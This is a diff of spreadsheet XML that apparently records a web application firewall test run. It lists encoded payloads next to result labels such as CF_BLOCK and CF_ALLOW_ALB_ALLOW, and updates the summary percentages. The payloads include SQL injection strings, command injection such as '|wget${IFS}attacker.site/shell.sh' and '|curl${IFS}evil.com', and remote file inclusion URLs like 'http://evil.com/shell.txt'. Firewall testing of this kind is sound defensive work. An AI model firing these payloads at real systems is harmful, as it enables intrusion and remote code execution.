         </is>
       </c>
-      <c r="C71" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C71" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D71" s="7" t="inlineStr">
@@ -17637,9 +17643,9 @@
           <t>%27%20UNION%20SELECT%201,2,3--</t>
         </is>
       </c>
-      <c r="C72" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C72" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D72" s="7" t="inlineStr">
@@ -17681,9 +17687,9 @@
           <t>admin%27%2f%2a%2a%2f--</t>
         </is>
       </c>
-      <c r="C74" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C74" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D74" s="7" t="inlineStr">
@@ -17725,9 +17731,9 @@
           <t>%27%2bOR%2b1%3d1--</t>
         </is>
       </c>
-      <c r="C76" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C76" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D76" s="7" t="inlineStr">
@@ -17747,9 +17753,9 @@
           <t>%60%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C77" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C77" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D77" s="7" t="inlineStr">
@@ -17791,9 +17797,9 @@
           <t>%27%2b%4f%52%2b1%3d1--+</t>
         </is>
       </c>
-      <c r="C79" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C79" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D79" s="7" t="inlineStr">
@@ -17857,9 +17863,9 @@
           <t>0%27%20UNION%20SELECT%20null,null,null--+</t>
         </is>
       </c>
-      <c r="C82" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C82" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D82" s="7" t="inlineStr">
@@ -18187,9 +18193,9 @@
           <t>%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C97" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C97" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D97" s="7" t="inlineStr">
@@ -18209,9 +18215,9 @@
           <t>1%27%20AND%201%3D1%20--</t>
         </is>
       </c>
-      <c r="C98" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C98" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D98" s="7" t="inlineStr">
@@ -18319,9 +18325,9 @@
           <t>1%a0OR%a01=1</t>
         </is>
       </c>
-      <c r="C103" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C103" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D103" s="7" t="inlineStr">
@@ -18343,7 +18349,7 @@
       </c>
       <c r="C104" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D104" s="6" t="inlineStr">
@@ -18627,9 +18633,9 @@
           <t>%27%20OR%201%3D1--+</t>
         </is>
       </c>
-      <c r="C117" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C117" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D117" s="7" t="inlineStr">
@@ -18759,9 +18765,9 @@
           <t>%3Bping%20-c%204%20evil.com</t>
         </is>
       </c>
-      <c r="C123" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C123" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D123" s="7" t="inlineStr">
@@ -18781,9 +18787,9 @@
           <t>%60whoami%60</t>
         </is>
       </c>
-      <c r="C124" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C124" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D124" s="7" t="inlineStr">
@@ -18803,9 +18809,9 @@
           <t>|curl$\{IFS\}evil.com</t>
         </is>
       </c>
-      <c r="C125" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C125" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D125" s="7" t="inlineStr">
@@ -18825,9 +18831,9 @@
           <t>|wget$\{IFS\}attacker.site%2fshell.sh</t>
         </is>
       </c>
-      <c r="C126" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C126" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D126" s="7" t="inlineStr">
@@ -18869,9 +18875,9 @@
           <t>$\{@print(md5(1234))\}</t>
         </is>
       </c>
-      <c r="C128" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C128" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D128" s="7" t="inlineStr">
@@ -19001,9 +19007,9 @@
           <t>';`wget attacker.sh`;//</t>
         </is>
       </c>
-      <c r="C134" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C134" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D134" s="7" t="inlineStr">
@@ -19133,9 +19139,9 @@
           <t>| powershell -Command "whoami"</t>
         </is>
       </c>
-      <c r="C140" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C140" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D140" s="7" t="inlineStr">
@@ -19177,9 +19183,9 @@
           <t>$\{@print(md5(1))\}</t>
         </is>
       </c>
-      <c r="C142" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C142" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D142" s="7" t="inlineStr">
@@ -19199,9 +19205,9 @@
           <t>%26%26%20whoami</t>
         </is>
       </c>
-      <c r="C143" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C143" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D143" s="7" t="inlineStr">
@@ -19463,9 +19469,9 @@
           <t>data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==</t>
         </is>
       </c>
-      <c r="C155" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C155" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D155" s="6" t="inlineStr">
@@ -19793,9 +19799,9 @@
           <t>http://evil.com/shell.txt</t>
         </is>
       </c>
-      <c r="C170" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C170" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D170" s="6" t="inlineStr">
@@ -19925,9 +19931,9 @@
           <t>http://evil.com/shell.txt?</t>
         </is>
       </c>
-      <c r="C176" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C176" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D176" s="6" t="inlineStr">
@@ -20035,9 +20041,9 @@
           <t>http://evil.com%00/shell.php</t>
         </is>
       </c>
-      <c r="C181" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C181" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D181" s="6" t="inlineStr">
@@ -20057,9 +20063,9 @@
           <t>http://evil.com//shell.txt</t>
         </is>
       </c>
-      <c r="C182" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C182" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D182" s="6" t="inlineStr">
@@ -20079,9 +20085,9 @@
           <t>http://ev%69l.com/shell.php</t>
         </is>
       </c>
-      <c r="C183" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C183" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D183" s="6" t="inlineStr">
@@ -20123,9 +20129,9 @@
           <t>new%20Function('alert(1)')()</t>
         </is>
       </c>
-      <c r="C185" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C185" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D185" s="7" t="inlineStr">
@@ -20147,7 +20153,7 @@
       </c>
       <c r="C186" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D186" s="6" t="inlineStr">
@@ -22433,9 +22439,9 @@
           <t>'%09OR%091=1</t>
         </is>
       </c>
-      <c r="C290" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C290" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D290" s="7" t="inlineStr">
@@ -22455,9 +22461,9 @@
           <t>'%20oR%201=1--</t>
         </is>
       </c>
-      <c r="C291" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C291" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D291" s="7" t="inlineStr">
@@ -22501,7 +22507,7 @@
       </c>
       <c r="C293" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D293" s="6" t="inlineStr">
@@ -22523,7 +22529,7 @@
       </c>
       <c r="C294" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D294" s="6" t="inlineStr">
@@ -22609,9 +22615,9 @@
           <t>'%2f**%2fOR%2f**%2f1=1--</t>
         </is>
       </c>
-      <c r="C298" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C298" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D298" s="7" t="inlineStr">
@@ -22807,9 +22813,9 @@
           <t>0x27206f7220313d31--</t>
         </is>
       </c>
-      <c r="C307" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C307" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D307" s="7" t="inlineStr">
@@ -22829,9 +22835,9 @@
           <t>%u0027%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C308" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C308" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D308" s="7" t="inlineStr">
@@ -22873,9 +22879,9 @@
           <t>%27UNION%0ASELECT%0ANULL,NULL--</t>
         </is>
       </c>
-      <c r="C310" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C310" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D310" s="7" t="inlineStr">
@@ -22895,9 +22901,9 @@
           <t>1' AND (SELECT 1 FROM dual WHERE 1=1)--</t>
         </is>
       </c>
-      <c r="C311" s="10" t="inlineStr">
-        <is>
-          <t>NO_CF_LOG</t>
+      <c r="C311" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D311" s="6" t="inlineStr">
@@ -23005,9 +23011,9 @@
           <t>1+oR+1=1</t>
         </is>
       </c>
-      <c r="C316" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C316" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D316" s="7" t="inlineStr">
@@ -23027,9 +23033,9 @@
           <t>1%0bOR%0b1=1</t>
         </is>
       </c>
-      <c r="C317" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C317" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D317" s="7" t="inlineStr">
@@ -23445,9 +23451,9 @@
           <t>%31%27%20--</t>
         </is>
       </c>
-      <c r="C336" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C336" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D336" s="7" t="inlineStr">
@@ -23489,9 +23495,9 @@
           <t>%27%2F**%2FOR%2F**%2F1%3D1--</t>
         </is>
       </c>
-      <c r="C338" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C338" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D338" s="7" t="inlineStr">
@@ -23599,9 +23605,9 @@
           <t>1-- -</t>
         </is>
       </c>
-      <c r="C343" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C343" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D343" s="7" t="inlineStr">
@@ -23676,6 +23682,7 @@
         </is>
       </c>
     </row>
+    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -23707,11 +23714,11 @@
         </is>
       </c>
       <c r="B350" t="n">
-        <v>150</v>
+        <v>145</v>
       </c>
       <c r="C350" t="inlineStr">
         <is>
-          <t>43.6%</t>
+          <t>42.2%</t>
         </is>
       </c>
     </row>
@@ -23722,11 +23729,11 @@
         </is>
       </c>
       <c r="B351" t="n">
-        <v>110</v>
+        <v>139</v>
       </c>
       <c r="C351" t="inlineStr">
         <is>
-          <t>32.0%</t>
+          <t>40.4%</t>
         </is>
       </c>
     </row>
@@ -23737,11 +23744,11 @@
         </is>
       </c>
       <c r="B352" t="n">
-        <v>1</v>
+        <v>6</v>
       </c>
       <c r="C352" t="inlineStr">
         <is>
-          <t>0.3%</t>
+          <t>1.7%</t>
         </is>
       </c>
     </row>
@@ -23752,11 +23759,11 @@
         </is>
       </c>
       <c r="B353" t="n">
-        <v>83</v>
+        <v>54</v>
       </c>
       <c r="C353" t="inlineStr">
         <is>
-          <t>24.1%</t>
+          <t>15.7%</t>
         </is>
       </c>
     </row>
@@ -24882,9 +24889,9 @@
           <t>admin' #</t>
         </is>
       </c>
-      <c r="C51" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C51" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D51" s="7" t="inlineStr">
@@ -24904,9 +24911,9 @@
           <t>%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C52" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C52" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D52" s="7" t="inlineStr">
@@ -24926,9 +24933,9 @@
           <t>%27%20OR%20%271%27=%271</t>
         </is>
       </c>
-      <c r="C53" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C53" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D53" s="7" t="inlineStr">
@@ -24948,9 +24955,9 @@
           <t>%27%20OR%20%271%27=%271%27--</t>
         </is>
       </c>
-      <c r="C54" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C54" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D54" s="7" t="inlineStr">
@@ -24992,9 +24999,9 @@
           <t>%27OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C56" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C56" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D56" s="7" t="inlineStr">
@@ -25014,9 +25021,9 @@
           <t>%27+OR+1%3D1--</t>
         </is>
       </c>
-      <c r="C57" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C57" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D57" s="7" t="inlineStr">
@@ -25102,9 +25109,9 @@
           <t>%27)%20OR%20(%271%27=%271</t>
         </is>
       </c>
-      <c r="C61" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C61" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D61" s="7" t="inlineStr">
@@ -25146,9 +25153,9 @@
           <t>'||'1'='1</t>
         </is>
       </c>
-      <c r="C63" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C63" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D63" s="6" t="inlineStr">
@@ -25256,9 +25263,9 @@
           <t>%27%20OR%201%3D1%20--%20</t>
         </is>
       </c>
-      <c r="C68" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C68" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D68" s="7" t="inlineStr">
@@ -25278,9 +25285,9 @@
           <t>%27)%20OR%20('1'%3D'1</t>
         </is>
       </c>
-      <c r="C69" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C69" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D69" s="7" t="inlineStr">
@@ -25300,9 +25307,9 @@
           <t>%25%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C70" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C70" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D70" s="7" t="inlineStr">
@@ -25322,9 +25329,9 @@
           <t>%27%20OR%201=1%20--%20</t>
         </is>
       </c>
-      <c r="C71" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C71" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D71" s="7" t="inlineStr">
@@ -25344,9 +25351,9 @@
           <t>%27%20UNION%20SELECT%201,2,3--</t>
         </is>
       </c>
-      <c r="C72" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C72" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D72" s="7" t="inlineStr">
@@ -25366,9 +25373,9 @@
           <t>admin%27--+</t>
         </is>
       </c>
-      <c r="C73" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C73" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D73" s="7" t="inlineStr">
@@ -25388,9 +25395,9 @@
           <t>admin%27%2f%2a%2a%2f--</t>
         </is>
       </c>
-      <c r="C74" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C74" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D74" s="7" t="inlineStr">
@@ -25432,9 +25439,9 @@
           <t>%27%2bOR%2b1%3d1--</t>
         </is>
       </c>
-      <c r="C76" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C76" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D76" s="7" t="inlineStr">
@@ -25454,9 +25461,9 @@
           <t>%60%27%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C77" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C77" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D77" s="7" t="inlineStr">
@@ -25498,9 +25505,9 @@
           <t>%27%2b%4f%52%2b1%3d1--+</t>
         </is>
       </c>
-      <c r="C79" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C79" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D79" s="7" t="inlineStr">
@@ -25564,9 +25571,9 @@
           <t>0%27%20UNION%20SELECT%20null,null,null--+</t>
         </is>
       </c>
-      <c r="C82" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C82" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D82" s="7" t="inlineStr">
@@ -25630,9 +25637,9 @@
           <t>')--</t>
         </is>
       </c>
-      <c r="C85" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C85" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D85" s="6" t="inlineStr">
@@ -25894,9 +25901,9 @@
           <t>%27%20OR%20%271%27%3D%271</t>
         </is>
       </c>
-      <c r="C97" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C97" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D97" s="7" t="inlineStr">
@@ -25916,9 +25923,9 @@
           <t>1%27%20AND%201%3D1%20--</t>
         </is>
       </c>
-      <c r="C98" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C98" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D98" s="7" t="inlineStr">
@@ -26026,9 +26033,9 @@
           <t>1%a0OR%a01=1</t>
         </is>
       </c>
-      <c r="C103" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C103" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D103" s="7" t="inlineStr">
@@ -26050,7 +26057,7 @@
       </c>
       <c r="C104" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D104" s="6" t="inlineStr">
@@ -26204,7 +26211,7 @@
       </c>
       <c r="C111" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D111" s="6" t="inlineStr">
@@ -26248,7 +26255,7 @@
       </c>
       <c r="C113" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D113" s="6" t="inlineStr">
@@ -26334,9 +26341,9 @@
           <t>%27%20OR%201%3D1--+</t>
         </is>
       </c>
-      <c r="C117" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C117" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D117" s="7" t="inlineStr">
@@ -26358,7 +26365,7 @@
       </c>
       <c r="C118" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D118" s="6" t="inlineStr">
@@ -26466,9 +26473,9 @@
           <t>%3Bping%20-c%204%20evil.com</t>
         </is>
       </c>
-      <c r="C123" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C123" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D123" s="7" t="inlineStr">
@@ -26488,9 +26495,9 @@
           <t>%60whoami%60</t>
         </is>
       </c>
-      <c r="C124" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C124" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D124" s="7" t="inlineStr">
@@ -26510,9 +26517,9 @@
           <t>|curl$\{IFS\}evil.com</t>
         </is>
       </c>
-      <c r="C125" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C125" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D125" s="7" t="inlineStr">
@@ -26532,9 +26539,9 @@
           <t>|wget$\{IFS\}attacker.site%2fshell.sh</t>
         </is>
       </c>
-      <c r="C126" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C126" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D126" s="7" t="inlineStr">
@@ -26576,9 +26583,9 @@
           <t>$\{@print(md5(1234))\}</t>
         </is>
       </c>
-      <c r="C128" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C128" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D128" s="7" t="inlineStr">
@@ -26708,9 +26715,9 @@
           <t>';`wget attacker.sh`;//</t>
         </is>
       </c>
-      <c r="C134" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C134" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D134" s="7" t="inlineStr">
@@ -26730,9 +26737,9 @@
           <t>;id</t>
         </is>
       </c>
-      <c r="C135" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C135" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D135" s="7" t="inlineStr">
@@ -26796,9 +26803,9 @@
           <t>&amp; uname -a</t>
         </is>
       </c>
-      <c r="C138" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C138" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D138" s="7" t="inlineStr">
@@ -26840,9 +26847,9 @@
           <t>| powershell -Command "whoami"</t>
         </is>
       </c>
-      <c r="C140" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C140" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D140" s="7" t="inlineStr">
@@ -26884,9 +26891,9 @@
           <t>$\{@print(md5(1))\}</t>
         </is>
       </c>
-      <c r="C142" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C142" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D142" s="7" t="inlineStr">
@@ -26906,9 +26913,9 @@
           <t>%26%26%20whoami</t>
         </is>
       </c>
-      <c r="C143" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C143" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D143" s="7" t="inlineStr">
@@ -26994,9 +27001,9 @@
           <t>$IFS$9$IFS$9whoami</t>
         </is>
